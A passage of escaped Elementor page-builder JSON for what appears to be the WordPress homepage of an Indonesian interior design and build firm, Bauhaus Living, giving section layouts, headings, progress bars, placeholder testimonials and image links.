sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Berikut alasan banyak yang memilih Bauhaus\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"im